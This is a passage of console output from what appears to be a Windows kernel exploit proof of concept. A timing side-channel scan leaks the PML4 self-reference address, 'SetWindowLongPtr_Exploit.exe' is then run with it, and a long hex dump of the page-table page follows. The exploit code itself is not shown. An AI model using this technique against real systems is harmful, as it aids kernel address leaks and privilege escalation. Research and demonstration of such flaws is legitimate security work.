ffff8a45229148a0, retrying...\r\n-] Removing 114 as it seems to be unmapped\r\n-] Removing 115 as it seems to be unmapped\r\n-] Removing 116 as it seems to be unmapped\r\n-] Removing 117 as it seems to be unmapped\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffe8f47a3d1e88, retrying...\r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246\r\n+] Removing 1ec from initial array and pushing it into final array\r\nUnmapped Initial: 233.678802\r\nMapped Initial: 214.496124\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 250.585373\r\nMapped: 213.339661\r\n--------------------------\r\n \r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926\r\nPML4e: FFFFF67B3D9ECF60 - Index: 1ec\r\nKNOWN_UNMAPPED PTE: fffff60000000000\r\nReal PML4 SelfRef Found: fffff67b3d9ecf60\r\nLeft in Potential Array: ffff8c46231188c0\r\nLeft in Potential Array: ffff8cc6633198c8\r\nLeft in Potential Array: ffff8d46a351a8d0\r\nLeft in Potential Array: ffff8dc6e371b8d8\r\nLeft in Potential Array: ffff8e472391c8e0\r\nLeft in Potential Array: ffff8ec763b1d8e8\r\nLeft in Potential Array: ffff8f47a3d1e8f0\r\nLeft in Potential Array: ffff8fc7e3f1f8f8\r\nLeft in Potential Array: ffff904824120900\r\nLeft in Potential Array: ffff90c864321908\r\nLeft in Potential Array: ffff9148a4522910\r\nLeft in Potential Array: ffff91c8e4723918\r\nLeft in Potential Array: ffff924924924920\r\nLeft in Potential Array: ffff92c964b25928\r\nLeft in Potential Array: ffff9349a4d26930\r\nLeft in Potential Array: ffff93c9e4f27938\r\nLeft in Potential Array: ffff944a25128940\r\nLeft in Potential Array: ffff94ca65329948\r\nLeft in Potential Array: ffff954aa552a950\r\nLeft in Potential Array: ffff95cae572b958\r\nLeft in Potential Array: ffff964b2592c960\r\nLeft in Potential Array: ffff96cb65b2d968\r\nLeft in Potential Array: ffff974ba5d2e970\r\nLeft in Potential Array: ffff97cbe5f2f978\r\nLeft in Potential Array: ffff984c26130980\r\nLeft in Potential Array: ffff98cc66331988\r\nLeft in Potential Array: ffff994ca6532990\r\nLeft in Potential Array: ffff99cce6733998\r\nLeft in Potential Array: ffff9a4d269349a0\r\nLeft in Potential Array: ffff9acd66b359a8\r\nLeft in Potential Array: ffff9b4da6d369b0\r\nLeft in Potential Array: ffff9bcde6f379b8\r\nLeft in Potential Array: ffff9c4e271389c0\r\nLeft in Potential Array: ffff9cce673399c8\r\nLeft in Potential Array: ffff9d4ea753a9d0\r\nLeft in Potential Array: ffff9dcee773b9d8\r\nLeft in Potential Array: ffff9e4f2793c9e0\r\nLeft in Potential Array: ffff9ecf67b3d9e8\r\nLeft in Potential Array: ffff9f4fa7d3e9f0\r\nLeft in Potential Array: ffff9fcfe7f3f9f8\r\nLeft in Potential Array: ffffa05028140a00\r\nLeft in Potential Array: ffffa0d068341a08\r\nLeft in Potential Array: ffffa150a8542a10\r\nLeft in Potential Array: ffffa1d0e8743a18\r\nLeft in Potential Array: ffffa25128944a20\r\nLeft in Potential Array: ffffa2d168b45a28\r\nLeft in Potential Array: ffffa351a8d46a30\r\nLeft in Potential Array: ffffa3d1e8f47a38\r\nLeft in Potential Array: ffffa45229148a40\r\nLeft in Potential Array: ffffa4d269349a48\r\nLeft in Potential Array: ffffa552a954aa50\r\nLeft in Potential Array: ffffa5d2e974ba58\r\nLeft in Potential Array: ffffa6532994ca60\r\nLeft in Potential Array: ffffa6d369b4da68\r\nLeft in Potential Array: ffffa753a9d4ea70\r\nLeft in Potential Array: ffffa7d3e9f4fa78\r\nLeft in Potential Array: ffffa8542a150a80\r\nLeft in Potential Array: ffffa8d46a351a88\r\nLeft in Potential Array: ffffa954aa552a90\r\nLeft in Potential Array: ffffa9d4ea753a98\r\nLeft in Potential Array: ffffaa552a954aa0\r\nLeft in Potential Array: ffffaad56ab55aa8\r\nLeft in Potential Array: ffffab55aad56ab0\r\nLeft in Potential Array: ffffabd5eaf57ab8\r\nLeft in Potential Array: ffffac562b158ac0\r\nLeft in Potential Array: ffffacd66b359ac8\r\nLeft in Potential Array: ffffad56ab55aad0\r\nLeft in Potential Array: ffffadd6eb75bad8\r\nLeft in Potential Array: ffffae572b95cae0\r\nLeft in Potential Array: ffffaed76bb5dae8\r\nLeft in Potential Array: ffffaf57abd5eaf0\r\nLeft in Potential Array: ffffafd7ebf5faf8\r\nLeft in Potential Array: ffffb0582c160b00\r\nLeft in Potential Array: ffffb0d86c361b08\r\nLeft in Potential Array: ffffb158ac562b10\r\nLeft in Potential Array: ffffb1d8ec763b18\r\nLeft in Potential Array: ffffb2592c964b20\r\nLeft in Potential Array: ffffb2d96cb65b28\r\nLeft in Potential Array: ffffb359acd66b30\r\nLeft in Potential Array: ffffb3d9ecf67b38\r\nLeft in Potential Array: ffffb45a2d168b40\r\nLeft in Potential Array: ffffb4da6d369b48\r\nLeft in Potential Array: ffffb55aad56ab50\r\nLeft in Potential Array: ffffb5daed76bb58\r\nLeft in Potential Array: ffffb65b2d96cb60\r\nLeft in Potential Array: ffffb6db6db6db68\r\nLeft in Potential Array: ffffb75badd6eb70\r\nLeft in Potential Array: ffffb7dbedf6fb78\r\nLeft in Potential Array: ffffb85c2e170b80\r\nLeft in Potential Array: ffffb8dc6e371b88\r\nLeft in Potential Array: ffffb95cae572b90\r\nLeft in Potential Array: ffffb9dcee773b98\r\nLeft in Potential Array: ffffba5d2e974ba0\r\nLeft in Potential Array: ffffbadd6eb75ba8\r\nLeft in Potential Array: ffffbb5daed76bb0\r\nLeft in Potential Array: ffffbbddeef77bb8\r\nLeft in Potential Array: ffffbc5e2f178bc0\r\nLeft in Potential Array: ffffbcde6f379bc8\r\nLeft in Potential Array: ffffbd5eaf57abd0\r\nLeft in Potential Array: ffffbddeef77bbd8\r\nLeft in Potential Array: ffffbe5f2f97cbe0\r\nLeft in Potential Array: ffffbedf6fb7dbe8\r\nLeft in Potential Array: ffffbf5fafd7ebf0\r\nLeft in Potential Array: ffffbfdfeff7fbf8\r\nLeft in Potential Array: ffffc06030180c00\r\nLeft in Potential Array: ffffc0e070381c08\r\nLeft in Potential Array: ffffc160b0582c10\r\nLeft in Potential Array: ffffc1e0f0783c18\r\nLeft in Potential Array: ffffc26130984c20\r\nLeft in Potential Array: ffffc2e170b85c28\r\nLeft in Potential Array: ffffc361b0d86c30\r\nLeft in Potential Array: ffffc3e1f0f87c38\r\nLeft in Potential Array: ffffc46231188c40\r\nLeft in Potential Array: ffffc4e271389c48\r\nLeft in Potential Array: ffffc562b158ac50\r\nLeft in Potential Array: ffffc5e2f178bc58\r\nLeft in Potential Array: ffffc6633198cc60\r\nLeft in Potential Array: ffffc6e371b8dc68\r\nLeft in Potential Array: ffffc763b1d8ec70\r\nLeft in Potential Array: ffffc7e3f1f8fc78\r\nLeft in Potential Array: ffffc86432190c80\r\nLeft in Potential Array: ffffc8e472391c88\r\nLeft in Potential Array: ffffc964b2592c90\r\nLeft in Potential Array: ffffc9e4f2793c98\r\nLeft in Potential Array: ffffca6532994ca0\r\nLeft in Potential Array: ffffcae572b95ca8\r\nLeft in Potential Array: ffffcb65b2d96cb0\r\nLeft in Potential Array: ffffcbe5f2f97cb8\r\nLeft in Potential Array: ffffcc6633198cc0\r\nLeft in Potential Array: ffffcce673399cc8\r\nLeft in Potential Array: ffffcd66b359acd0\r\nLeft in Potential Array: ffffcde6f379bcd8\r\nLeft in Potential Array: ffffce673399cce0\r\nLeft in Potential Array: ffffcee773b9dce8\r\nLeft in Potential Array: ffffcf67b3d9ecf0\r\nLeft in Potential Array: ffffcfe7f3f9fcf8\r\nLeft in Potential Array: ffffd068341a0d00\r\nLeft in Potential Array: ffffd0e8743a1d08\r\nLeft in Potential Array: ffffd168b45a2d10\r\nLeft in Potential Array: ffffd1e8f47a3d18\r\nLeft in Potential Array: ffffd269349a4d20\r\nLeft in Potential Array: ffffd2e974ba5d28\r\nLeft in Potential Array: ffffd369b4da6d30\r\nLeft in Potential Array: ffffd3e9f4fa7d38\r\nLeft in Potential Array: ffffd46a351a8d40\r\nLeft in Potential Array: ffffd4ea753a9d48\r\nLeft in Potential Array: ffffd56ab55aad50\r\nLeft in Potential Array: ffffd5eaf57abd58\r\nLeft in Potential Array: ffffd66b359acd60\r\nLeft in Potential Array: ffffd6eb75badd68\r\nLeft in Potential Array: ffffd76bb5daed70\r\nLeft in Potential Array: ffffd7ebf5fafd78\r\nLeft in Potential Array: ffffd86c361b0d80\r\nLeft in Potential Array: ffffd8ec763b1d88\r\nLeft in Potential Array: ffffd96cb65b2d90\r\nLeft in Potential Array: ffffd9ecf67b3d98\r\nLeft in Potential Array: ffffda6d369b4da0\r\nLeft in Potential Array: ffffdaed76bb5da8\r\nLeft in Potential Array: ffffdb6db6db6db0\r\nLeft in Potential Array: ffffdbedf6fb7db8\r\nLeft in Potential Array: ffffdc6e371b8dc0\r\nLeft in Potential Array: ffffdcee773b9dc8\r\nLeft in Potential Array: ffffdd6eb75badd0\r\nLeft in Potential Array: ffffddeef77bbdd8\r\nLeft in Potential Array: ffffde6f379bcde0\r\nLeft in Potential Array: ffffdeef77bbdde8\r\nLeft in Potential Array: ffffdf6fb7dbedf0\r\nLeft in Potential Array: ffffdfeff7fbfdf8\r\nLeft in Potential Array: ffffe070381c0e00\r\nLeft in Potential Array: ffffe0f0783c1e08\r\nLeft in Potential Array: ffffe170b85c2e10\r\nLeft in Potential Array: ffffe1f0f87c3e18\r\nLeft in Potential Array: ffffe271389c4e20\r\nLeft in Potential Array: ffffe2f178bc5e28\r\nLeft in Potential Array: ffffe371b8dc6e30\r\nLeft in Potential Array: ffffe3f1f8fc7e38\r\nLeft in Potential Array: ffffe472391c8e40\r\nLeft in Potential Array: ffffe4f2793c9e48\r\nLeft in Potential Array: ffffe572b95cae50\r\nLeft in Potential Array: ffffe5f2f97cbe58\r\nLeft in Potential Array: ffffe673399cce60\r\nLeft in Potential Array: ffffe6f379bcde68\r\nLeft in Potential Array: ffffe773b9dcee70\r\nLeft in Potential Array: ffffe7f3f9fcfe78\r\nLeft in Potential Array: ffffe8743a1d0e80\r\nLeft in Potential Array: ffffe8f47a3d1e88\r\nLeft in Potential Array: ffffe974ba5d2e90\r\nLeft in Potential Array: ffffe9f4fa7d3e98\r\nLeft in Potential Array: ffffea753a9d4ea0\r\nLeft in Potential Array: ffffeaf57abd5ea8\r\nLeft in Potential Array: ffffeb75badd6eb0\r\nLeft in Potential Array: ffffebf5fafd7eb8\r\nLeft in Potential Array: ffffec763b1d8ec0\r\nLeft in Potential Array: ffffecf67b3d9ec8\r\nLeft in Potential Array: ffffed76bb5daed0\r\nLeft in Potential Array: ffffedf6fb7dbed8\r\nLeft in Potential Array: ffffee773b9dcee0\r\nLeft in Potential Array: ffffeef77bbddee8\r\nLeft in Potential Array: ffffef77bbddeef0\r\nLeft in Potential Array: ffffeff7fbfdfef8\r\nLeft in Potential Array: fffff0783c1e0f00\r\nLeft in Potential Array: fffff0f87c3e1f08\r\nLeft in Potential Array: fffff178bc5e2f10\r\nLeft in Potential Array: fffff1f8fc7e3f18\r\nLeft in Potential Array: fffff2793c9e4f20\r\nLeft in Potential Array: fffff2f97cbe5f28\r\nLeft in Potential Array: fffff379bcde6f30\r\nLeft in Potential Array: fffff3f9fcfe7f38\r\nLeft in Potential Array: fffff47a3d1e8f40\r\nLeft in Potential Array: fffff4fa7d3e9f48\r\nLeft in Potential Array: fffff57abd5eaf50\r\nLeft in Potential Array: fffff5fafd7ebf58\r\nLeft in Potential Array: fffff6fb7dbedf68\r\nLeft in Potential Array: fffff77bbddeef70\r\nLeft in Potential Array: fffff7fbfdfeff78\r\nLeft in Potential Array: fffff87c3e1f0f80\r\nLeft in Potential Array: fffff8fc7e3f1f88\r\nLeft in Potential Array: fffff97cbe5f2f90\r\nLeft in Potential Array: fffff9fcfe7f3f98\r\nLeft in Potential Array: fffffa7d3e9f4fa0\r\nLeft in Potential Array: fffffafd7ebf5fa8\r\nLeft in Potential Array: fffffb7dbedf6fb0\r\nLeft in Potential Array: fffffbfdfeff7fb8\r\nLeft in Potential Array: fffffc7e3f1f8fc0\r\nLeft in Potential Array: fffffcfe7f3f9fc8\r\nLeft in Potential Array: fffffd7ebf5fafd0\r\nLeft in Potential Array: fffffdfeff7fbfd8\r\nLeft in Potential Array: fffffe7f3f9fcfe0\r\nLeft in Potential Array: fffffeff7fbfdfe8\r\nLeft in Potential Array: ffffff7fbfdfeff0\r\nLeft in Potential Array: fffffffffffffff8\r\nLeft in Final Array: fffff67b3d9ecf60\r\nResult: fffff67b3d9ecf60\r\nRun SetWindowLongPtr_Exploit.exe\r\nC:\\Users\\qa\\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60\r\nMy PID is: 6056\r\nCurrent Username: qa\r\nPML4 Self Ref: FFFFF67B3D9ECF60\r\nEnter to continue...\r\n \r\n Value Self Ref = 8000000100211867\r\n000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....\r\n000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............\r\n000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.\r\n000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......\r\n000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......\r\n000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....\r\n000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............\r\n000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............\r\n000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....\r\n000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 